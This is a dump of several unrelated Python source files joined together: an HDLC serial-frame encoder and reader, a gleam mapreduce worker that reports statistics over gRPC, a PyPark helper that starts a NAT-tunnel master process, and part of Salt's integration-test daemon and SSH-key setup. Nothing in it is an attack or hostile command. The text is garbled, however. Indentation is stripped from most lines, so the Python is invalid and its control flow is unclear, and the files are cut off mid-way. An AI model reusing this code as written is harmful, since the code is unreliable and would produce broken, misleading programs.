if not res:
logger.warning(f"invalid crc {self.crc} != {calcCRC(self.data)}")
self.error = True
return res
def toString(self):
return self.data.decode('utf-8').rstrip('\0')
class HDLC(object):
def __init__(self, serial, dumpFile=None):
self.serial = serial
self.current_frame = None
self.last_frame = None
self.frame_callback = None
self.error_callback = None
self.running = False
self.dumpFile = dumpFile
@classmethod
def toBytes(cls, data):
return bytearray(data)
def sendFrame(self, data):
bs = self._encode(self.toBytes(data))
# logger.info("Sending Frame: %d", len(data))
res = self.serial.write(bs)
# logger.info("Send %s bytes", res)
def _onFrame(self, frame):
self.last_frame = frame
s = self.last_frame.toString()
# logger.info("Received Frame: %d %s", len(s), s[:20])
if self.frame_callback is not None:
self.frame_callback(s)
def _onError(self, frame):
self.last_frame = frame
s = self.last_frame.toString()
logger.warning("Frame Error: %d %s", len(s), s[:20])
if self.error_callback is not None:
self.error_callback(s)
def _readBytesAndProc(self, size):
b = bytearray(self.serial.read(size))
if self.dumpFile is not None:
self.dumpFile.write(b)
for i in range(len(b)):
self._readByteAndProc(b[i])
def _readByteAndProc(self, b):
assert 0 <= b <= 255
if b == 0x7E:
# Start or End
if not self.current_frame or len(self.current_frame) < 1:
# Start
self.current_frame = Frame()
else:
# End
self.current_frame.finish()
self.current_frame.checkCRC()
elif self.current_frame is None:
# Ignore before Start
return False
elif not self.current_frame.finished:
self.current_frame.addByte(b)
else:
# Ignore Bytes
pass
# Validate and return
if self.current_frame.finished and not self.current_frame.error:
# Success
self._onFrame(self.current_frame)
self.current_frame = None
return True
elif self.current_frame.finished:
# Error
self._onError(self.current_frame)
self.current_frame = None
return True
return False
# def readFrame(self, timeout=5):
# timer = time.time() + timeout
# while time.time() < timer:
# i = self.serial.in_waiting
# if i < 1:
# time.sleep(0.0001)
# continue
# res = self._readBytes(i)
# if res:
# # Validate and return
# if not self.last_frame.error:
# # Success
# s = self.last_frame.toString()
# return s
# elif self.last_frame.finished:
# # Error
# raise ValueError("Invalid Frame (CRC FAIL)")
# raise RuntimeError("readFrame timeout")
@classmethod
def _encode(cls, bs):
data = bytearray()
data.append(0x7E)
crc = calcCRC(bs)
bs = bs + crc
for byte in bs:
if byte == 0x7E or byte == 0x7D:
data.append(0x7D)
data.append(byte ^ 0x20)
else:
data.append(byte)
data.append(0x7E)
return bytes(data)
def _receiveLoop(self):
while self.running:
i = self.serial.in_waiting
if i < 1:
time.sleep(0.001)
# print(".", end="")
# sys.stdout.flush()
continue
self._readBytesAndProc(i)
def startReader(self, onFrame, onError=None):
if self.running:
raise RuntimeError("reader already running")
self.reader = Thread(target=self._receiveLoop)
        self.reader.daemon = True
self.frame_callback = onFrame
self.error_callback = onError
self.running = True
self.reader.start()
def stopReader(self):
self.running = False
try:
self.reader.join()
        except Exception:
pass
self.reader = None
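# ---------------------------------------------------------------------------
# Hedged usage sketch (added; not part of the original module): how this HDLC
# class might be wired to a pyserial port. The device name, baud rate and
# payload below are illustrative assumptions only.
if __name__ == '__main__':
    import serial  # pyserial, assumed to be installed

    def on_frame(payload):
        # Called from the reader thread with the decoded frame as a string.
        print("received:", payload)

    port = serial.Serial('/dev/ttyUSB0', 115200, timeout=0)  # hypothetical device
    hdlc = HDLC(port)
    hdlc.startReader(onFrame=on_frame)
    hdlc.sendFrame(b'hello')
    time.sleep(1.0)
    hdlc.stopReader()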
|
mapreduce.py
|
import sys
import mrutil
import argparse
import threading
from time import sleep
import grpc
import gleam_pb2
import gleam_pb2_grpc
parser = argparse.ArgumentParser(description="mapreduce args")
parser.add_argument('--pymodule', '-module', required=True, type=str, help='python mapreduce module file')
group = parser.add_mutually_exclusive_group()
group.add_argument('--pymapper', '-mapper', type=str, help='map function')
group.add_argument("--pyreducer", '-reducer', type=str, help='reduce function')
parser.add_argument('--keyFields', '-keyFields', type=str, help='reduce keyFields')
parser.add_argument('--executor', '-gleam.executor')
parser.add_argument('--hashcode', '-flow.hashcode')
parser.add_argument('--stepId', '-flow.stepId')
parser.add_argument('--taskId', '-flow.taskId')
args = parser.parse_args()
def reportStat(stoppingReport, finishedReport):
lastRound = False
while True:
exeStat = gleam_pb2.ExecutionStat()
exeStat.flowHashCode = int(args.hashcode)
stat = exeStat.stats.add()
stat.stepId = int(args.stepId)
stat.taskId = int(args.taskId)
stat.inputCounter = mrutil.InputCounter
stat.outputCounter = mrutil.OutputCounter
yield exeStat
if(lastRound):
break
stoppingReport.wait(timeout=1.0)
        if stoppingReport.is_set():
lastRound = True
def reportMain(stoppingReport, finishedReport):
with grpc.insecure_channel(args.executor) as channel:
stub = gleam_pb2_grpc.GleamExecutorStub(channel)
# get report stream iterator
statIter = reportStat(stoppingReport, finishedReport)
stub.CollectExecutionStatistics(statIter)
finishedReport.set()
def getUserMapper():
if(args.pymapper == None):
return None
else:
module = __import__(args.pymodule)
f = getattr(module, args.pymapper)
return f
def getUserReducer():
if(args.pyreducer == None):
return None, None
else:
# get reducer
module = __import__(args.pymodule)
f = getattr(module, args.pyreducer)
# get reduce keyindexes
keyIndexes = []
keyFields = args.keyFields.split(',')
for index in keyFields:
keyIndexes.append(int(index))
# mrutil.writeLogObject(keyIndexes)
return f, keyIndexes
def mainMapReduce():
# start report thread
stoppingReport = threading.Event()
finishedReport = threading.Event()
t = threading.Thread(target=reportMain, args=(stoppingReport, finishedReport))
t.start()
# start mapreduce in main
if(args.pymapper != None):
mapMain()
elif(args.pyreducer != None):
reduceMain()
else:
mrutil.writeError("python mapper or reducer do not specify\n")
# stop report notify
stoppingReport.set()
# wait report stopped
finishedReport.wait()
def useKeys(keyValues, keyIndexes):
if(len(keyValues) < len(keyIndexes)):
mrutil.writeError("python reduce keyindexes > keyvalues\n")
return None, None
keys = []
values = []
used = []
for i in range(len(keyValues)):
used.append(False)
for pos in keyIndexes:
# key pos start from 1
keys.append(keyValues[pos-1])
used[pos-1] = True
for i, kv in enumerate(keyValues):
if(not used[i]):
values.append(kv)
return keys, values
def getTsKeyValues(kvdict):
ts = 0
kvList = []
if kvdict.get('K__slc'):
for key in kvdict['K__slc']:
kvList.append(key)
if kvdict.get('V__slc'):
for val in kvdict['V__slc']:
kvList.append(val)
if kvdict.get('T__i64'):
ts = kvdict['T__i64']
return ts, kvList
def getKeyValues(kvdict):
kvList = []
if kvdict.get('K__slc'):
for key in kvdict['K__slc']:
kvList.append(key)
if kvdict.get('V__slc'):
for val in kvdict['V__slc']:
kvList.append(val)
return kvList
def reduce(f, x, y):
if(len(x) == 1 and len(y) == 1):
return [f(x[0], y[0])]
else:
kvList = f(x, y)
return kvList
def doProcessReducer(f):
kvdict = mrutil.readRow()
if kvdict == None:
# mrutil.writeError("python reducer input row error\n")
return
mrutil.inputCounterInc()
lastTs, lastKvList = getTsKeyValues(kvdict)
while True:
kvdict = mrutil.readRow()
if kvdict == None:
break
mrutil.inputCounterInc()
ts, kvList = getTsKeyValues(kvdict)
lastVList = reduce(f, lastKvList, kvList)
lastKList = kvList
if(ts > lastTs):
lastTs = ts
mrutil.tsWriteRow(lastTs, lastKList, lastVList)
def doProcessReducerByKeys(f, keyIndexes):
kvdict = mrutil.readRow()
if kvdict == None:
# mrutil.writeError("python reducerByKeys input row error\n")
return
mrutil.inputCounterInc()
lastTs, lastKvList = getTsKeyValues(kvdict)
lastKList, lastVList = useKeys(lastKvList, keyIndexes)
while True:
kvdict = mrutil.readRow()
if kvdict == None:
return
mrutil.inputCounterInc()
ts, kvList = getTsKeyValues(kvdict)
kList, vList = useKeys(kvList, keyIndexes)
if(mrutil.compare(lastKList, kList)):
lastVList = reduce(f, lastVList, vList)
else:
mrutil.tsWriteRow(lastTs, lastKList, lastVList)
lastKList, lastVList = kList, vList
if(ts > lastTs):
lastTs = ts
def reduceMain():
f, keyIndexes = getUserReducer()
if(f == None or keyIndexes == None):
mrutil.writeError("python reducer not found\n")
return
else:
# mrutil.writeLogObject(keyIndexes)
if(len(keyIndexes) == 1 and keyIndexes[0] == 0):
return doProcessReducer(f)
else:
return doProcessReducerByKeys(f, keyIndexes)
def mapMain():
f = getUserMapper()
if f == None:
mrutil.writeError("python get mapper fail\n")
return
while True:
kvdict = mrutil.readRow()
if kvdict == None:
return
mrutil.inputCounterInc()
kvList = getKeyValues(kvdict)
if(kvList != None):
f(kvList)
else:
mrutil.writeError("python map get bad row\n")
return
mainMapReduce()
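# ---------------------------------------------------------------------------
# Hedged illustration (added, comments only): the module named by --pymodule is
# imported with __import__ above, and --pymapper / --pyreducer name plain
# functions inside it. Judging from how f is called above, a reducer for
# single-value rows is just a binary function, e.g. in a hypothetical mymr.py:
#
#     def add(x, y):
#         return int(x) + int(y)
#
# invoked roughly as:
#     ... --pymodule mymr --pyreducer add --keyFields 1
#
# A mapper receives the row's key/value list and writes its output back
# through mrutil (that writer API is not shown in this file).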
|
master.py
|
import logging
from multiprocessing import Process
from PyPark.result import Result
from PyPark.shootback.master import run_master
from PyPark.util.net import get_random_port
def addNat(data):
from PyPark.park import NAT_IP,NAT_PORT_MAP
nat_port = int(data['nat_port'])
target_addr = data['target_addr']
np = NAT_PORT_MAP.get(nat_port, None)
if np is None:
logging.info("===========增加NAT===================")
data_port = data.get("data_port", None)
if data_port is None:
data_port = get_random_port(ip=NAT_IP)
communicate_addr = ("0.0.0.0", data_port)
customer_listen_addr = ("0.0.0.0", nat_port)
secret_key = data["secret_key"]
process = Process(target=run_master, args=(communicate_addr, customer_listen_addr, secret_key))
process.start()
NAT_PORT_MAP[nat_port] = {
"process_pid": process.pid,
"secret_key": secret_key,
"data_port": data_port,
"target_addr": target_addr,
}
data["nat_port"] = nat_port
data["master_ip"] = NAT_IP
data["data_port"] = data_port
print("addNat", data)
logging.info(f"===========增加NAT nat_port:{nat_port}======data_port:{data_port}=============")
return Result.success(data=data)
data["nat_port"] = nat_port
data["master_ip"] = NAT_IP
data["data_port"] = np["data_port"]
data["secret_key"] = np["secret_key"]
return Result.success(data=data)
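# Hedged usage sketch (added, comments only): the payload shape is inferred
# from the lookups above; every value below is a placeholder.
#
#     addNat({
#         "nat_port": "8022",             # public port the master will expose
#         "target_addr": "127.0.0.1:22",  # address the remote client forwards to
#         "secret_key": "demo-secret",
#         # "data_port": 10022,           # optional; a random port if omitted
#     })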
|
__init__.py
|
# -*- coding: utf-8 -*-
"""
Set up the Salt integration test suite
"""
from __future__ import absolute_import, print_function
import atexit
import copy
import errno
import logging
import multiprocessing
import os
import pprint
import re
import shutil
import signal
import socket
import stat
import subprocess
import sys
import tempfile
import threading
import time
from datetime import datetime, timedelta
import salt
import salt.config
import salt.log.setup as salt_log_setup
import salt.master
import salt.minion
import salt.output
import salt.runner
import salt.utils.color
import salt.utils.files
import salt.utils.msgpack
import salt.utils.path
import salt.utils.platform
import salt.utils.process
import salt.utils.stringutils
import salt.utils.yaml
import salt.version
from salt.exceptions import SaltClientError
from salt.ext import six
from salt.utils.immutabletypes import freeze
from salt.utils.verify import verify_env
from tests.support.cli_scripts import ScriptPathMixin
from tests.support.helpers import RedirectStdStreams, requires_sshd_server
from tests.support.mixins import (
AdaptedConfigurationTestCaseMixin,
CheckShellBinaryNameAndVersionMixin,
SaltClientTestCaseMixin,
SaltMinionEventAssertsMixin,
SaltReturnAssertsMixin,
ShellCaseCommonTestsMixin,
)
from tests.support.parser import PNUM, SaltTestcaseParser, print_header
from tests.support.paths import * # pylint: disable=wildcard-import
from tests.support.processes import * # pylint: disable=wildcard-import
from tests.support.processes import SaltMaster, SaltMinion, SaltSyndic
from tests.support.runtests import RUNTIME_VARS
from tests.support.unit import TestCase
try:
import pwd
except ImportError:
pass
try:
import salt.ext.six.moves.socketserver as socketserver # pylint: disable=no-name-in-module
except ImportError:
import socketserver
log = logging.getLogger(__name__)
_RUNTESTS_PORTS = {}
def get_unused_localhost_port():
"""
Return a random unused port on localhost
"""
usock = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
usock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
usock.bind(("127.0.0.1", 0))
port = usock.getsockname()[1]
if port in (54505, 54506, 64505, 64506, 64507, 64508, 64510, 64511, 64520, 64521):
# These ports are hardcoded in the test configuration
port = get_unused_localhost_port()
usock.close()
return port
DARWIN = True if sys.platform.startswith("darwin") else False
BSD = True if "bsd" in sys.platform else False
AIX = True if sys.platform.startswith("aix") else False
if (AIX or DARWIN) and port in _RUNTESTS_PORTS:
port = get_unused_localhost_port()
usock.close()
return port
_RUNTESTS_PORTS[port] = usock
if DARWIN or BSD or AIX:
usock.close()
return port
def close_open_sockets(sockets_dict):
for port in list(sockets_dict):
sock = sockets_dict.pop(port)
sock.close()
atexit.register(close_open_sockets, _RUNTESTS_PORTS)
SALT_LOG_PORT = get_unused_localhost_port()
class ThreadingMixIn(socketserver.ThreadingMixIn):
daemon_threads = False
class ThreadedSocketServer(ThreadingMixIn, socketserver.TCPServer, object):
allow_reuse_address = True
def server_activate(self):
self.shutting_down = threading.Event()
super(ThreadedSocketServer, self).server_activate()
def server_close(self):
if hasattr(self, "shutting_down"):
self.shutting_down.set()
super(ThreadedSocketServer, self).server_close()
class SocketServerRequestHandler(socketserver.StreamRequestHandler):
def handle(self):
unpacker = salt.utils.msgpack.Unpacker(encoding="utf-8")
while not self.server.shutting_down.is_set():
try:
wire_bytes = self.request.recv(1024)
if not wire_bytes:
break
unpacker.feed(wire_bytes)
for record_dict in unpacker:
record = logging.makeLogRecord(record_dict)
logger = logging.getLogger(record.name)
logger.handle(record)
del record_dict
except (EOFError, KeyboardInterrupt, SystemExit):
break
except socket.error as exc:
try:
if exc.errno == errno.WSAECONNRESET:
# Connection reset on windows
break
except AttributeError:
# We're not on windows
pass
log.exception(exc)
except Exception as exc: # pylint: disable=broad-except
log.exception(exc)
class TestDaemonStartFailed(Exception):
"""
Simple exception to signal that a test daemon failed to start
"""
class TestDaemon(object):
"""
Set up the master and minion daemons, and run related cases
"""
MINIONS_CONNECT_TIMEOUT = MINIONS_SYNC_TIMEOUT = 600
def __init__(self, parser):
self.parser = parser
self.colors = salt.utils.color.get_colors(
self.parser.options.no_colors is False
)
if salt.utils.platform.is_windows():
# There's no shell color support on windows...
for key in self.colors:
self.colors[key] = ""
def __enter__(self):
"""
Start a master and minion
"""
# Setup the multiprocessing logging queue listener
salt_log_setup.setup_multiprocessing_logging_listener(self.master_opts)
# Set up PATH to mockbin
self._enter_mockbin()
self.minion_targets = set(["minion", "sub_minion"])
if self.parser.options.transport == "zeromq":
self.start_zeromq_daemons()
elif self.parser.options.transport == "tcp":
self.start_tcp_daemons()
self.pre_setup_minions()
self.setup_minions()
if getattr(self.parser.options, "ssh", False):
self.prep_ssh()
self.wait_for_minions(time.time(), self.MINIONS_CONNECT_TIMEOUT)
if self.parser.options.sysinfo:
try:
print_header(
"~~~~~~~ Versions Report ",
inline=True,
width=getattr(self.parser.options, "output_columns", PNUM),
)
except TypeError:
print_header("~~~~~~~ Versions Report ", inline=True)
print("\n".join(salt.version.versions_report()))
try:
print_header(
"~~~~~~~ Minion Grains Information ",
inline=True,
width=getattr(self.parser.options, "output_columns", PNUM),
)
except TypeError:
print_header("~~~~~~~ Minion Grains Information ", inline=True)
grains = self.client.cmd("minion", "grains.items")
minion_opts = self.minion_opts.copy()
minion_opts["color"] = self.parser.options.no_colors is False
salt.output.display_output(grains, "grains", minion_opts)
try:
print_header(
"=",
sep="=",
inline=True,
width=getattr(self.parser.options, "output_columns", PNUM),
)
except TypeError:
print_header("", sep="=", inline=True)
try:
return self
finally:
self.post_setup_minions()
def start_zeromq_daemons(self):
"""
Fire up the daemons used for zeromq tests
"""
self.log_server = ThreadedSocketServer(
("localhost", SALT_LOG_PORT), SocketServerRequestHandler
)
self.log_server_process = threading.Thread(target=self.log_server.serve_forever)
self.log_server_process.start()
try:
sys.stdout.write(
" * {LIGHT_YELLOW}Starting salt-master ... {ENDC}".format(**self.colors)
)
sys.stdout.flush()
self.master_process = start_daemon(
daemon_name="salt-master",
daemon_id=self.master_opts["id"],
daemon_log_prefix="salt-master/{}".format(self.master_opts["id"]),
daemon_cli_script_name="master",
daemon_config=self.master_opts,
daemon_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
daemon_class=SaltMaster,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
event_listener_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
start_timeout=120,
)
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_GREEN}Starting salt-master ... STARTED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_RED}Starting salt-master ... FAILED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
try:
sys.stdout.write(
" * {LIGHT_YELLOW}Starting salt-minion ... {ENDC}".format(**self.colors)
)
sys.stdout.flush()
self.minion_process = start_daemon(
daemon_name="salt-minion",
daemon_id=self.master_opts["id"],
daemon_log_prefix="salt-minion/{}".format(self.minion_opts["id"]),
daemon_cli_script_name="minion",
daemon_config=self.minion_opts,
daemon_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
daemon_class=SaltMinion,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
event_listener_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
start_timeout=120,
)
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_GREEN}Starting salt-minion ... STARTED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_RED}Starting salt-minion ... FAILED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
try:
sys.stdout.write(
" * {LIGHT_YELLOW}Starting sub salt-minion ... {ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
self.sub_minion_process = start_daemon(
daemon_name="sub salt-minion",
daemon_id=self.master_opts["id"],
daemon_log_prefix="sub-salt-minion/{}".format(
self.sub_minion_opts["id"]
),
daemon_cli_script_name="minion",
daemon_config=self.sub_minion_opts,
daemon_config_dir=RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR,
daemon_class=SaltMinion,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
event_listener_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
start_timeout=120,
)
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_GREEN}Starting sub salt-minion ... STARTED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_RED}Starting sub salt-minion ... FAILED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
try:
sys.stdout.write(
" * {LIGHT_YELLOW}Starting syndic salt-master ... {ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
self.prep_syndic()
self.smaster_process = start_daemon(
daemon_name="salt-smaster",
daemon_id=self.syndic_master_opts["id"],
daemon_log_prefix="salt-smaster/{}".format(
self.syndic_master_opts["id"]
),
daemon_cli_script_name="master",
daemon_config=self.syndic_master_opts,
daemon_config_dir=RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR,
daemon_class=SaltMaster,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
event_listener_config_dir=RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR,
start_timeout=120,
)
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_GREEN}Starting syndic salt-master ... STARTED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_RED}Starting syndic salt-master ... FAILED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
try:
sys.stdout.write(
" * {LIGHT_YELLOW}Starting salt-syndic ... {ENDC}".format(**self.colors)
)
sys.stdout.flush()
self.syndic_process = start_daemon(
daemon_name="salt-syndic",
daemon_id=self.syndic_opts["id"],
daemon_log_prefix="salt-syndic/{}".format(self.syndic_opts["id"]),
daemon_cli_script_name="syndic",
daemon_config=self.syndic_opts,
daemon_config_dir=RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR,
daemon_class=SaltSyndic,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
event_listener_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
start_timeout=120,
)
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_GREEN}Starting salt-syndic ... STARTED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_RED}Starting salt-syndic ... FAILED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
if self.parser.options.proxy:
self.minion_targets.add(self.proxy_opts["id"])
try:
sys.stdout.write(
" * {LIGHT_YELLOW}Starting salt-proxy ... {ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
self.proxy_process = start_daemon(
daemon_name="salt-proxy",
daemon_id=self.proxy_opts["id"],
daemon_log_prefix="salt-proxy/{}".format(self.proxy_opts["id"]),
daemon_cli_script_name="proxy",
daemon_config=self.proxy_opts,
daemon_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
daemon_class=SaltProxy,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
start_timeout=120,
)
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_GREEN}Starting salt-proxy ... STARTED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_RED}Starting salt-proxy ... FAILED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
start_tcp_daemons = start_zeromq_daemons
def prep_syndic(self):
"""
Create a roster file for salt's syndic
"""
roster_path = os.path.join(FILES, "conf/_ssh/roster")
shutil.copy(roster_path, RUNTIME_VARS.TMP_CONF_DIR)
shutil.copy(roster_path, RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR)
def prep_ssh(self):
"""
Generate keys and start an ssh daemon on an alternate port
"""
sys.stdout.write(
" * {LIGHT_GREEN}Starting {0} ... {ENDC}".format(
"SSH server", **self.colors
)
)
keygen = salt.utils.path.which("ssh-keygen")
sshd = salt.utils.path.which("sshd")
if not (keygen and sshd):
print(
"WARNING: Could not initialize SSH subsystem. Tests for salt-ssh may break!"
)
return
if not os.path.exists(RUNTIME_VARS.TMP_CONF_DIR):
os.makedirs(RUNTIME_VARS.TMP_CONF_DIR)
# Generate client key
pub_key_test_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "key_test.pub")
priv_key_test_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "key_test")
if os.path.exists(pub_key_test_file):
os.remove(pub_key_test_file)
if os.path.exists(priv_key_test_file):
os.remove(priv_key_test_file)
keygen_process = subprocess.Popen(
[
keygen,
"-t",
"ecdsa",
"-b",
"521",
"-C",
'"$(whoami)@$(hostname)-$(date -I)"',
"-f",
"key_test",
"-P",
"",
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=RUNTIME_VARS.TMP_CONF_DIR,
)
_, keygen_err = keygen_process.communicate()
if keygen_err:
print(
"ssh-keygen had errors: {0}".format(
salt.utils.stringutils.to_str(keygen_err)
)
)
sshd_config_path = os.path.join(FILES, "conf/_ssh/sshd_config")
shutil.copy(sshd_config_path, RUNTIME_VARS.TMP_CONF_DIR)
auth_key_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "key_test.pub")
# Generate server key
server_key_dir = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "server")
if not os.path.exists(server_key_dir):
os.makedirs(server_key_dir)
server_dsa_priv_key_file = os.path.join(server_key_dir, "ssh_host_dsa_key")
server_dsa_pub_key_file = os.path.join(server_key_dir, "ssh_host_dsa_key.pub")
server_ecdsa_priv_key_file = os.path.join(server_key_dir, "ssh_host_ecdsa_key")
server_ecdsa_pub_key_file = os.path.join(
server_key_dir, "ssh_host_ecdsa_key.pub"
)
server_ed25519_priv_key_file = os.path.join(
server_key_dir, "ssh_host_ed25519_key"
)
server_ed25519_pub_key_file = os.path.join(
server_key_dir, "ssh_host.ed25519_key.pub"
)
for server_key_file in (
server_dsa_priv_key_file,
server_dsa_pub_key_file,
server_ecdsa_priv_key_file,
server_ecdsa_pub_key_file,
server_ed25519_priv_key_file,
server_ed25519_pub_key_file,
):
if os.path.exists(server_key_file):
os.remove(server_key_file)
keygen_process_dsa = subprocess.Popen(
[
keygen,
"-t",
"dsa",
"-b",
"1024",
"-C",
'"$(whoami)@$(hostname)-$(date -I)"',
"-f",
"ssh_host_dsa_key",
"-P",
"",
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=server_key_dir,
)
_, keygen_dsa_err = keygen_process_dsa.communicate()
if keygen_dsa_err:
print(
"ssh-keygen had errors: {0}".format(
salt.utils.stringutils.to_str(keygen_dsa_err)
)
)
keygen_process_ecdsa = subprocess.Popen(
[
keygen,
"-t",
"ecdsa",
"-b",
"521",
"-C",
'"$(whoami)@$(hostname)-$(date -I)"',
"-f",
"ssh_host_ecdsa_key",
"-P",
"",
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=server_key_dir,
)
_, keygen_escda_err = keygen_process_ecdsa.communicate()
if keygen_escda_err:
print(
"ssh-keygen had errors: {0}".format(
salt.utils.stringutils.to_str(keygen_escda_err)
)
)
keygen_process_ed25519 = subprocess.Popen(
[
keygen,
"-t",
"ed25519",
"-b",
"521",
"-C",
'"$(whoami)@$(hostname)-$(date -I)"',
"-f",
"ssh_host_ed25519_key",
"-P",
"",
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=server_key_dir,
)
_, keygen_ed25519_err = keygen_process_ed25519.communicate()
if keygen_ed25519_err:
print(
"ssh-keygen had errors: {0}".format(
salt.utils.stringutils.to_str(keygen_ed25519_err)
)
)
with salt.utils.files.fopen(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "sshd_config"), "a"
) as ssh_config:
ssh_config.write("AuthorizedKeysFile {0}\n".format(auth_key_file))
if not keygen_dsa_err:
ssh_config.write("HostKey {0}\n".format(server_dsa_priv_key_file))
if not keygen_escda_err:
ssh_config.write("HostKey {0}\n".format(server_ecdsa_priv_key_file))
if not keygen_ed25519_err:
ssh_config.write("HostKey {0}\n".format(server_ed25519_priv_key_file))
self.sshd_pidfile = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "sshd.pid")
self.sshd_process = subprocess.Popen(
[sshd, "-f", "sshd_config", "-o", "PidFile={0}".format(self.sshd_pidfile)],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=RUNTIME_VARS.TMP_CONF_DIR,
)
_, sshd_err = self.sshd_process.communicate()
if sshd_err:
print(
"sshd had errors on startup: {0}".format(
salt.utils.stringutils.to_str(sshd_err)
)
)
else:
os.environ["SSH_DAEMON_RUNNING"] = "True"
self.prep_syndic()
with salt.utils.files.fopen(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "roster"), "a"
) as roster:
roster.write(" user: {0}\n".format(RUNTIME_VARS.RUNNING_TESTS_USER))
roster.write(
" priv: {0}/{1}\n".format(RUNTIME_VARS.TMP_CONF_DIR, "key_test")
)
if salt.utils.platform.is_darwin():
roster.write(" set_path: $PATH:/usr/local/bin/\n")
sys.stdout.write(" {LIGHT_GREEN}STARTED!\n{ENDC}".format(**self.colors))
@classmethod
def config(cls, role):
"""
Return a configuration for a master/minion/syndic.
Currently these roles are:
* master
* minion
* syndic
* syndic_master
* sub_minion
* proxy
"""
return RUNTIME_VARS.RUNTIME_CONFIGS[role]
@classmethod
def config_location(cls):
return RUNTIME_VARS.TMP_CONF_DIR
@property
def client(self):
"""
Return a local client which will be used for example to ping and sync
the test minions.
This client is defined as a class attribute because its creation needs
        to be deferred to a later stage. If it were created on `__enter__` as it
        was previously, it would not receive the master events.
"""
if "runtime_client" not in RUNTIME_VARS.RUNTIME_CONFIGS:
RUNTIME_VARS.RUNTIME_CONFIGS[
"runtime_client"
] = salt.client.get_local_client(mopts=self.master_opts)
return RUNTIME_VARS.RUNTIME_CONFIGS["runtime_client"]
@classmethod
def transplant_configs(cls, transport="zeromq"):
if os.path.isdir(RUNTIME_VARS.TMP):
shutil.rmtree(RUNTIME_VARS.TMP)
os.makedirs(RUNTIME_VARS.TMP)
os.makedirs(RUNTIME_VARS.TMP_ROOT_DIR)
